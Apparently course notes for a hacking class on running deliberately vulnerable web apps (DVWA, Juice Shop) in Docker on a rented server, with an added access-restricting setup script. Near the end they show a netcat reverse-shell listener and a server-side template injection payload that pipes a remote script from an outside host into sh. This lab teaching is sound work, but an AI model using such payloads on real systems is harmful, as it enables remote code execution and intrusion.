OK goal for today:
This is a nice follow-up to the reverse shell goal from last class, as you need a box with a public IP and a port you can control. I also think it's nice for Thanksgiving week, so you've got a nice wide set of vulnerabilities to hack with for Project 2.
OK spinning up a box and paying for the number of minutes it stays on.
So the version of dockering we want to do here is quickly getting someone else's backend running.
Generally the stages of running docker look roughly like this:
Then there are online distributions of docker images that you can publish to or shop from.
Shop around at https://hub.docker.com/
Run the docker service: service docker start
Open up particular ports: ufw enable
ufw allow 8080
ufw allow 3000
If anything goes wrong, look for guides.
OK these vulnerable webapps are available to us so let's run them:
Run DVWA: docker run --rm -it -p 8080:80 vulnerables/web-dvwa
visit YOURIP:8080
Run OWASP Juice Box: docker run --rm -it -p 3000:3000 bkimminich/juice-shop
visit YOURIP:3000
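Both apps are deliberately vulnerable and, run as above, answer to anyone who finds YOURIP. The script below is an added example (not part of the original notes) that brings up the same two containers but only lets one admin IP reach them; it filters in Docker's DOCKER-USER chain because published container ports are forwarded past ufw's allow rules. The admin IP, the eth0 interface name, SSH on 22/tcp and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original notes. ADMIN_IP, EXT_IF (default eth0),
# SSH on 22/tcp and all function names are assumptions.
# DRY_RUN=1 (default) prints each command; DRY_RUN=0 runs it (needs root).

run() {
    if [ "${DRY_RUN:-1}" = 1 ]; then echo "$*"; else "$@"; fi
}

# Accept only a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1            # split on dots; input is digits and dots only here
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

lab_up() {
    admin_ip=$1
    ext_if=${2:-eth0}
    valid_ipv4 "$admin_ip" || { echo "bad admin IP: $admin_ip" >&2; return 1; }
    run service docker start          # the daemon creates the DOCKER-USER chain
    # Allow SSH before enabling ufw so the session that runs this survives.
    run ufw allow 22/tcp
    run ufw --force enable
    # Published container ports are forwarded, not INPUT traffic, so ufw
    # allow/deny rules do not gate them. Filter in DOCKER-USER instead.
    # -I inserts at the top, so the ACCEPT added second ends up above the DROP.
    run iptables -I DOCKER-USER -i "$ext_if" ! -s "$admin_ip" -j DROP
    run iptables -I DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
    # -d instead of -it so both containers can start from one script.
    run docker run --rm -d -p 8080:80 vulnerables/web-dvwa
    run docker run --rm -d -p 3000:3000 bkimminich/juice-shop
}

# Usage: DRY_RUN=0 sh lab_up.sh 203.0.113.7 eth0   (203.0.113.7 is a sample IP)
if [ "$#" -gt 0 ]; then lab_up "$@"; fi
```

Run it once with the default DRY_RUN=1 to read the plan before letting it touch the firewall.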
You can probably find publicly hosted versions of these things too, but that's not as useful to your growth.
File Upload Exploits, Command Injection, SQL injection, bad credentials, etc etc etc
You can also set up a reverse shell listener on your box while you have it running.
ufw allow 9977
nc -lvnp 9977
For our SSTI problem from last class the solution we (JD and I) eventually found was to curl one of these payloads in:
https://general-immediate-fish.glitch.me/=process.mainModule.require('child_process').exec('curl%20is.am%2FIDHERE%20%7C%20sh')